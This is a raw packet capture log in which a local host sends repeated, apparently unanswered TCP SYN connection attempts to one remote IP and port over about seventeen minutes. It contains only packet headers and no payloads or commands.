2015-05-19 22:43:42.781140 IP 192.168.1.101.41438 > 193.0.200.131.35689: Flags [S], seq 1708471948, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….7…e…….ie.6………Y……………
2015-05-19 22:43:48.788690 IP 192.168.1.101.41438 > 193.0.200.131.35689: Flags [S], seq 1708471948, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….ie.6…..p…m………..
2015-05-19 22:44:02.790559 IP 192.168.1.101.41442 > 193.0.200.131.35689: Flags [S], seq 3609674557, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.’@……..e…….i.’C=……………………
2015-05-19 22:44:05.790280 IP 192.168.1.101.41442 > 193.0.200.131.35689: Flags [S], seq 3609674557, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i.’C=……………………
2015-05-19 22:44:11.790842 IP 192.168.1.101.41442 > 193.0.200.131.35689: Flags [S], seq 3609674557, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.4@……..e…….i.’C=….p……………
2015-05-19 22:44:25.792586 IP 192.168.1.101.41443 > 193.0.200.131.35689: Flags [S], seq 937022666, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.O@……..e…….i7………………………
2015-05-19 22:44:28.793449 IP 192.168.1.101.41443 > 193.0.200.131.35689: Flags [S], seq 937022666, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.T@……..e…….i7………………………
2015-05-19 22:44:34.794979 IP 192.168.1.101.41443 > 193.0.200.131.35689: Flags [S], seq 937022666, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.`@……..e…….i7…….p……………
2015-05-19 22:44:48.797759 IP 192.168.1.101.41456 > 193.0.200.131.35689: Flags [S], seq 1374426740, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….~…e…….iQ..t……………………
2015-05-19 22:44:51.801565 IP 192.168.1.101.41456 > 193.0.200.131.35689: Flags [S], seq 1374426740, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….S…e…….iQ..t……………………
2015-05-19 22:44:57.802119 IP 192.168.1.101.41456 > 193.0.200.131.35689: Flags [S], seq 1374426740, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0 .@….\…e…….iQ..t….p……………
2015-05-19 22:45:11.804697 IP 192.168.1.101.41459 > 193.0.200.131.35689: Flags [S], seq 885907208, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4
.@….e…e…….i4…………Q…………..
2015-05-19 22:45:14.807720 IP 192.168.1.101.41459 > 193.0.200.131.35689: Flags [S], seq 885907208, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.<@……..e…….i4…………Q…………..
2015-05-19 22:45:20.811279 IP 192.168.1.101.41459 > 193.0.200.131.35689: Flags [S], seq 885907208, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.D@……..e…….i4…….p….Z……….
2015-05-19 22:45:34.809703 IP 192.168.1.101.41460 > 193.0.200.131.35689: Flags [S], seq 4092093695, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….&…e…….i..d……….>…………..
2015-05-19 22:45:37.810893 IP 192.168.1.101.41460 > 193.0.200.131.35689: Flags [S], seq 4092093695, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….#…e…….i..d……….>…………..
2015-05-19 22:45:43.812421 IP 192.168.1.101.41460 > 193.0.200.131.35689: Flags [S], seq 4092093695, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i..d…..p….G……….
2015-05-19 22:45:57.814163 IP 192.168.1.101.41461 > 193.0.200.131.35689: Flags [S], seq 572438117, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….m…e…….i”..e……………………
2015-05-19 22:46:00.814028 IP 192.168.1.101.41461 > 193.0.200.131.35689: Flags [S], seq 572438117, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….i…e…….i”..e……………………
2015-05-19 22:46:06.814592 IP 192.168.1.101.41461 > 193.0.200.131.35689: Flags [S], seq 572438117, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.b@……..e…….i”..e….p…1………..
2015-05-19 22:46:20.815295 IP 192.168.1.101.41462 > 193.0.200.131.35689: Flags [S], seq 1559560763, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.v@……..e…….i\..;……………………
2015-05-19 22:46:23.817191 IP 192.168.1.101.41462 > 193.0.200.131.35689: Flags [S], seq 1559560763, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.x@……..e…….i\..;……………………
2015-05-19 22:46:29.808739 IP 192.168.1.101.41462 > 193.0.200.131.35689: Flags [S], seq 1559560763, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i\..;….p……………
2015-05-19 22:46:43.811428 IP 192.168.1.101.41463 > 193.0.200.131.35689: Flags [S], seq 3500157718, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i..+……….l…………..
2015-05-19 22:46:46.811311 IP 192.168.1.101.41463 > 193.0.200.131.35689: Flags [S], seq 3500157718, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i..+……….l…………..
2015-05-19 22:46:52.817899 IP 192.168.1.101.41463 > 193.0.200.131.35689: Flags [S], seq 3500157718, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i..+…..p….v……….
2015-05-19 22:47:06.819680 IP 192.168.1.101.41464 > 193.0.200.131.35689: Flags [S], seq 548102885, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….o…e…….i .b………r……………
2015-05-19 22:47:09.819480 IP 192.168.1.101.41464 > 193.0.200.131.35689: Flags [S], seq 548102885, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….i…e…….i .b………r……………
2015-05-19 22:47:15.820053 IP 192.168.1.101.41464 > 193.0.200.131.35689: Flags [S], seq 548102885, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@….C…e…….i .b…..p……………
2015-05-19 22:47:29.821951 IP 192.168.1.101.41489 > 193.0.200.131.35689: Flags [S], seq 823938168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.z@……..e…….i1.Lx……..xu…………..
2015-05-19 22:47:32.827188 IP 192.168.1.101.41489 > 193.0.200.131.35689: Flags [S], seq 823938168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i1.Lx……..xu…………..
2015-05-19 22:47:38.822455 IP 192.168.1.101.41489 > 193.0.200.131.35689: Flags [S], seq 823938168, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i1.Lx….p….~……….
2015-05-19 22:47:52.827607 IP 192.168.1.101.41492 > 193.0.200.131.35689: Flags [S], seq 2828130050, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….k…e…….i…………vr…………..
2015-05-19 22:47:55.831418 IP 192.168.1.101.41492 > 193.0.200.131.35689: Flags [S], seq 2828130050, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….i…………vr…………..
2015-05-19 22:48:01.827974 IP 192.168.1.101.41492 > 193.0.200.131.35689: Flags [S], seq 2828130050, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0..@……..e…….i……..p….{……….
2015-05-19 22:48:15.832754 IP 192.168.1.101.41586 > 193.0.200.131.35689: Flags [S], seq 423860234, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.u@……..e…..r.i.C.
……..D[…………..
2015-05-19 22:48:18.920631 IP 192.168.1.101.41586 > 193.0.200.131.35689: Flags [S], seq 423860234, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…..r.i.C.
……..D[…………..
2015-05-19 22:48:24.918941 IP 192.168.1.101.41586 > 193.0.200.131.35689: Flags [S], seq 423860234, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.V@……..e…..r.i.C.
….p…Xd……….
2015-05-19 22:48:38.924242 IP 192.168.1.101.41655 > 193.0.200.131.35689: Flags [S], seq 3230952061, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@….8…e…….i..j}………Q…………..
2015-05-19 22:48:41.921826 IP 192.168.1.101.41655 > 193.0.200.131.35689: Flags [S], seq 3230952061, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4. @….)…e…….i..j}………Q…………..
2015-05-19 22:48:47.915120 IP 192.168.1.101.41655 > 193.0.200.131.35689: Flags [S], seq 3230952061, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.0@……..e…….i..j}….p….Z……….
2015-05-19 22:49:01.930685 IP 192.168.1.101.41685 > 193.0.200.131.35689: Flags [S], seq 1387284181, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.)@…. …e…….iR.F………[……………
2015-05-19 22:49:04.926023 IP 192.168.1.101.41685 > 193.0.200.131.35689: Flags [S], seq 1387284181, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.E@……..e…….iR.F………[……………
2015-05-19 22:49:10.929412 IP 192.168.1.101.41685 > 193.0.200.131.35689: Flags [S], seq 1387284181, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.x@……..e…….iR.F…..p…o………..
2015-05-19 22:49:24.935696 IP 192.168.1.101.41698 > 193.0.200.131.35689: Flags [S], seq 3724820665, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4#d@……..e…….i..@……….z…………..
2015-05-19 22:49:27.933360 IP 192.168.1.101.41698 > 193.0.200.131.35689: Flags [S], seq 3724820665, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4&u@……..e…….i..@……….z…………..
2015-05-19 22:49:33.933646 IP 192.168.1.101.41698 > 193.0.200.131.35689: Flags [S], seq 3724820665, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0).@….3…e…….i..@…..p……………
2015-05-19 22:49:47.937004 IP 192.168.1.101.41712 > 193.0.200.131.35689: Flags [S], seq 1703430963, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.=@……..e…….ie.K3……..Do…………..
2015-05-19 22:49:50.929557 IP 192.168.1.101.41712 > 193.0.200.131.35689: Flags [S], seq 1703430963, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@……..e…….ie.K3……..Do…………..
2015-05-19 22:49:56.945920 IP 192.168.1.101.41712 > 193.0.200.131.35689: Flags [S], seq 1703430963, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..00.@…~~…e…….ie.K3….p…Xx……….
2015-05-19 22:50:10.948522 IP 192.168.1.101.41725 > 193.0.200.131.35689: Flags [S], seq 3276694413, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..46,@…y….e…….i.Nc……….A…………..
2015-05-19 22:50:13.939347 IP 192.168.1.101.41725 > 193.0.200.131.35689: Flags [S], seq 3276694413, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..46.@…x….e…….i.Nc……….A…………..
2015-05-19 22:50:19.940906 IP 192.168.1.101.41725 > 193.0.200.131.35689: Flags [S], seq 3276694413, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..07.@…wX…e…….i.Nc…..p….J……….
2015-05-19 22:50:33.942897 IP 192.168.1.101.41726 > 193.0.200.131.35689: Flags [S], seq 842228766, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..49.@…ui…e…….i23d………^……………
2015-05-19 22:50:36.944517 IP 192.168.1.101.41726 > 193.0.200.131.35689: Flags [S], seq 842228766, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..49.@…u^…e…….i23d………^……………
2015-05-19 22:50:42.950121 IP 192.168.1.101.41726 > 193.0.200.131.35689: Flags [S], seq 842228766, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0:M@…t….e…….i23d…..p…r………..
2015-05-19 22:50:56.947975 IP 192.168.1.101.41727 > 193.0.200.131.35689: Flags [S], seq 2799338978, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=*@…r….e…….i………….^…………..
2015-05-19 22:50:59.947686 IP 192.168.1.101.41727 > 193.0.200.131.35689: Flags [S], seq 2799338978, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=u@…q….e…….i………….^…………..
2015-05-19 22:51:05.947248 IP 192.168.1.101.41727 > 193.0.200.131.35689: Flags [S], seq 2799338978, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0=.@…q….e…….i……..p….g……….
2015-05-19 22:51:19.948986 IP 192.168.1.101.41728 > 193.0.200.131.35689: Flags [S], seq 649020158, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…q….e…….i&.B……….m…………..
2015-05-19 22:51:22.949810 IP 192.168.1.101.41728 > 193.0.200.131.35689: Flags [S], seq 649020158, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…q}…e…….i&.B……….m…………..
2015-05-19 22:51:28.952353 IP 192.168.1.101.41728 > 193.0.200.131.35689: Flags [S], seq 649020158, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0=.@…qx…e…….i&.B…..p….v……….
2015-05-19 22:51:42.946366 IP 192.168.1.101.41729 > 193.0.200.131.35689: Flags [S], seq 1922664322, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…qN…e…….ir………………………
2015-05-19 22:51:45.945957 IP 192.168.1.101.41729 > 193.0.200.131.35689: Flags [S], seq 1922664322, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4=.@…qD…e…….ir………………………
2015-05-19 22:51:51.945492 IP 192.168.1.101.41729 > 193.0.200.131.35689: Flags [S], seq 1922664322, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0=.@…q=…e…….ir…….p……………
2015-05-19 22:52:05.948015 IP 192.168.1.101.41730 > 193.0.200.131.35689: Flags [S], seq 3527401253, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>?@…p….e…….i.?.%……..C……………
2015-05-19 22:52:08.949102 IP 192.168.1.101.41730 > 193.0.200.131.35689: Flags [S], seq 3527401253, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>C@…p….e…….i.?.%……..C……………
2015-05-19 22:52:14.951656 IP 192.168.1.101.41730 > 193.0.200.131.35689: Flags [S], seq 3527401253, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0>T@…p….e…….i.?.%….p…W………..
2015-05-19 22:52:28.955362 IP 192.168.1.101.41731 > 193.0.200.131.35689: Flags [S], seq 4028872115, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…p….e…….i.#……….O@…………..
2015-05-19 22:52:31.955245 IP 192.168.1.101.41731 > 193.0.200.131.35689: Flags [S], seq 4028872115, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…p….e…….i.#……….O@…………..
2015-05-19 22:52:37.955817 IP 192.168.1.101.41731 > 193.0.200.131.35689: Flags [S], seq 4028872115, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0>.@…p….e…….i.#……p…cI……….
2015-05-19 22:52:51.947574 IP 192.168.1.101.41734 > 193.0.200.131.35689: Flags [S], seq 2842368198, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…pD…e…….i.k……….2……………
2015-05-19 22:52:54.947382 IP 192.168.1.101.41734 > 193.0.200.131.35689: Flags [S], seq 2842368198, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4>.@…pA…e…….i.k……….2……………
2015-05-19 22:53:00.947951 IP 192.168.1.101.41734 > 193.0.200.131.35689: Flags [S], seq 2842368198, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…p4…e…….i.k……p…F………..
2015-05-19 22:53:14.949739 IP 192.168.1.101.41735 > 193.0.200.131.35689: Flags [S], seq 3758356897, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?A@…o….e…….i………….n…………..
2015-05-19 22:53:17.951544 IP 192.168.1.101.41735 > 193.0.200.131.35689: Flags [S], seq 3758356897, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?M@…o….e…….i………….n…………..
2015-05-19 22:53:23.958065 IP 192.168.1.101.41735 > 193.0.200.131.35689: Flags [S], seq 3758356897, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?\@…o….e…….i……..p…/w……….
2015-05-19 22:53:37.958830 IP 192.168.1.101.41736 > 193.0.200.131.35689: Flags [S], seq 2760270797, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o….e…….i..c…………………….
2015-05-19 22:53:40.957654 IP 192.168.1.101.41736 > 193.0.200.131.35689: Flags [S], seq 2760270797, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o….e…….i..c…………………….
2015-05-19 22:53:46.952260 IP 192.168.1.101.41736 > 193.0.200.131.35689: Flags [S], seq 2760270797, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…o….e…….i..c…..p……………
2015-05-19 22:54:00.952060 IP 192.168.1.101.41737 > 193.0.200.131.35689: Flags [S], seq 1389541223, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…or…e….. .iR..g……………………
2015-05-19 22:54:03.951812 IP 192.168.1.101.41737 > 193.0.200.131.35689: Flags [S], seq 1389541223, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…on…e….. .iR..g……………………
2015-05-19 22:54:09.952363 IP 192.168.1.101.41737 > 193.0.200.131.35689: Flags [S], seq 1389541223, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…o_…e….. .iR..g….p……………
2015-05-19 22:54:23.954267 IP 192.168.1.101.41739 > 193.0.200.131.35689: Flags [S], seq 337217321, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o@…e…….i…)……..Y……………
2015-05-19 22:54:26.953971 IP 192.168.1.101.41739 > 193.0.200.131.35689: Flags [S], seq 337217321, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@…o;…e…….i…)……..Y……………
2015-05-19 22:54:32.954505 IP 192.168.1.101.41739 > 193.0.200.131.35689: Flags [S], seq 337217321, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0?.@…o7…e…….i…)….p…m………..
2015-05-19 22:54:46.955253 IP 192.168.1.101.41740 > 193.0.200.131.35689: Flags [S], seq 545814888, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@.@…o#…e…….i .yh……..[……………
2015-05-19 22:54:49.962121 IP 192.168.1.101.41740 > 193.0.200.131.35689: Flags [S], seq 545814888, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@.@…o….e…….i .yh……..[……………
2015-05-19 22:54:55.962667 IP 192.168.1.101.41740 > 193.0.200.131.35689: Flags [S], seq 545814888, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0@#@…o….e…….i .yh….p…o’……….
2015-05-19 22:55:09.954406 IP 192.168.1.101.41741 > 193.0.200.131.35689: Flags [S], seq 1613853392, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@2@…o….e…….i`1r………”……………
2015-05-19 22:55:12.955236 IP 192.168.1.101.41741 > 193.0.200.131.35689: Flags [S], seq 1613853392, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@8@…n….e…….i`1r………”……………
2015-05-19 22:55:18.956803 IP 192.168.1.101.41741 > 193.0.200.131.35689: Flags [S], seq 1613853392, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0@=@…n….e…….i`1r…..p…6………..
2015-05-19 22:55:32.956650 IP 192.168.1.101.41742 > 193.0.200.131.35689: Flags [S], seq 2489177970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@K@…n….e…….i.].r………<…………..
2015-05-19 22:55:35.964393 IP 192.168.1.101.41742 > 193.0.200.131.35689: Flags [S], seq 2489177970, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4@r@…n….e…….i.].r………<…………..
2015-05-19 22:55:41.959972 IP 192.168.1.101.41742 > 193.0.200.131.35689: Flags [S], seq 2489177970, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0A.@…ml…e…….i.].r….p….E……….
2015-05-19 22:55:55.965645 IP 192.168.1.101.41781 > 193.0.200.131.35689: Flags [S], seq 375778480, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4C.@…k~…e…..5.i.e……………………..
2015-05-19 22:55:58.960530 IP 192.168.1.101.41781 > 193.0.200.131.35689: Flags [S], seq 375778480, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Eh@…i….e…..5.i.e……………………..
2015-05-19 22:56:04.963079 IP 192.168.1.101.41781 > 193.0.200.131.35689: Flags [S], seq 375778480, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0F.@…h….e…..5.i.e……p……………
2015-05-19 22:56:18.958807 IP 192.168.1.101.41786 > 193.0.200.131.35689: Flags [S], seq 2053087168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4I.@…f….e…..:.iz_……………………..
2015-05-19 22:56:21.958697 IP 192.168.1.101.41786 > 193.0.200.131.35689: Flags [S], seq 2053087168, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4I.@…f….e…..:.iz_……………………..
2015-05-19 22:56:27.967248 IP 192.168.1.101.41786 > 193.0.200.131.35689: Flags [S], seq 2053087168, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0I.@…e….e…..:.iz_……p……………
2015-05-19 22:56:41.962700 IP 192.168.1.101.41789 > 193.0.200.131.35689: Flags [S], seq 3006669846, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Kv@…c….e…..=.i.6$…………………….
2015-05-19 22:56:44.962564 IP 192.168.1.101.41789 > 193.0.200.131.35689: Flags [S], seq 3006669846, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4K.@…c….e…..=.i.6$…………………….
2015-05-19 22:56:50.963118 IP 192.168.1.101.41789 > 193.0.200.131.35689: Flags [S], seq 3006669846, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0L.@…c’…e…..=.i.6$…..p…1………..
2015-05-19 22:57:04.974558 IP 192.168.1.101.41790 > 193.0.200.131.35689: Flags [S], seq 899971548, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M.@…b1…e…..>.i5.y………E\…………..
2015-05-19 22:57:07.973995 IP 192.168.1.101.41790 > 193.0.200.131.35689: Flags [S], seq 899971548, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M @…b)…e…..>.i5.y………E\…………..
2015-05-19 22:57:13.972242 IP 192.168.1.101.41790 > 193.0.200.131.35689: Flags [S], seq 899971548, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M.@…b….e…..>.i5.y…..p…Ye……….
2015-05-19 22:57:27.979634 IP 192.168.1.101.41793 > 193.0.200.131.35689: Flags [S], seq 540171989, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M+@…b….e…..A.i 2^………u……………
2015-05-19 22:57:30.979237 IP 192.168.1.101.41793 > 193.0.200.131.35689: Flags [S], seq 540171989, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M-@…b….e…..A.i 2^………u……………
2015-05-19 22:57:36.979777 IP 192.168.1.101.41793 > 193.0.200.131.35689: Flags [S], seq 540171989, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M>@…a….e…..A.i 2^…..p……………
2015-05-19 22:57:50.988501 IP 192.168.1.101.41794 > 193.0.200.131.35689: Flags [S], seq 930477087, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4MM@…a….e…..B.i7u………..C…………..
2015-05-19 22:57:53.992913 IP 192.168.1.101.41794 > 193.0.200.131.35689: Flags [S], seq 930477087, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4MQ@…a….e…..B.i7u………..C…………..
2015-05-19 22:57:59.995137 IP 192.168.1.101.41794 > 193.0.200.131.35689: Flags [S], seq 930477087, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M`@…a….e…..B.i7u……p….L……….
2015-05-19 22:58:14.000717 IP 192.168.1.101.41795 > 193.0.200.131.35689: Flags [S], seq 3824759108, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Mp@…a….e…..C.i..1D……………………
2015-05-19 22:58:17.000851 IP 192.168.1.101.41795 > 193.0.200.131.35689: Flags [S], seq 3824759108, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4M{@…a….e…..C.i..1D……………………
2015-05-19 22:58:22.998067 IP 192.168.1.101.41795 > 193.0.200.131.35689: Flags [S], seq 3824759108, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0M.@…a….e…..C.i..1D….p……………
2015-05-19 22:58:37.007038 IP 192.168.1.101.41877 > 193.0.200.131.35689: Flags [S], seq 1035663520, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4T.@…Zn…e…….i=…………*…………..
2015-05-19 22:58:40.004782 IP 192.168.1.101.41877 > 193.0.200.131.35689: Flags [S], seq 1035663520, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U.@…Z-…e…….i=…………*…………..
2015-05-19 22:58:46.012994 IP 192.168.1.101.41877 > 193.0.200.131.35689: Flags [S], seq 1035663520, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0U6@…Z….e…….i=…….p….3……….
2015-05-19 22:59:00.011125 IP 192.168.1.101.41890 > 193.0.200.131.35689: Flags [S], seq 1777002274, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Ur@…Y….e…….ii..”………k…………..
2015-05-19 22:59:03.010649 IP 192.168.1.101.41890 > 193.0.200.131.35689: Flags [S], seq 1777002274, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U|@…Y….e…….ii..”………k…………..
2015-05-19 22:59:09.010899 IP 192.168.1.101.41890 > 193.0.200.131.35689: Flags [S], seq 1777002274, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0U.@…Y….e…….ii..”….p….t……….
2015-05-19 22:59:23.027431 IP 192.168.1.101.41891 > 193.0.200.131.35689: Flags [S], seq 2745533777, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U.@…Y….e…….i…Q……………………
2015-05-19 22:59:26.028608 IP 192.168.1.101.41891 > 193.0.200.131.35689: Flags [S], seq 2745533777, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4U.@…Yz…e…….i…Q……………………
2015-05-19 22:59:32.038811 IP 192.168.1.101.41891 > 193.0.200.131.35689: Flags [S], seq 2745533777, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0U.@…Ym…e…….i…Q….p……………
2015-05-19 22:59:46.054163 IP 192.168.1.101.41904 > 193.0.200.131.35689: Flags [S], seq 632161584, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4W0@…X….e…….i%..0……………………
2015-05-19 22:59:49.053842 IP 192.168.1.101.41904 > 193.0.200.131.35689: Flags [S], seq 632161584, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4Z.@…U$…e…….i%..0……………………
2015-05-19 22:59:55.057099 IP 192.168.1.101.41904 > 193.0.200.131.35689: Flags [S], seq 632161584, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0Z.@…T….e…….i%..0….p……………
2015-05-19 23:00:09.059766 IP 192.168.1.101.41961 > 193.0.200.131.35689: Flags [S], seq 3753719765, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4\.@…S….e…….i..7…………………….
2015-05-19 23:00:12.068147 IP 192.168.1.101.41961 > 193.0.200.131.35689: Flags [S], seq 3753719765, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4\.@…S….e…….i..7…………………….
2015-05-19 23:00:18.075364 IP 192.168.1.101.41961 > 193.0.200.131.35689: Flags [S], seq 3753719765, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0\U@…R….e…….i..7…..p……………
2015-05-19 23:00:32.089231 IP 192.168.1.101.41967 > 193.0.200.131.35689: Flags [S], seq 2151446048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4].@…QC…e…….i.<v ……………………
2015-05-19 23:00:35.092161 IP 192.168.1.101.41967 > 193.0.200.131.35689: Flags [S], seq 2151446048, win 65535, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4^.@…Q’…e…….i.<v ……………………
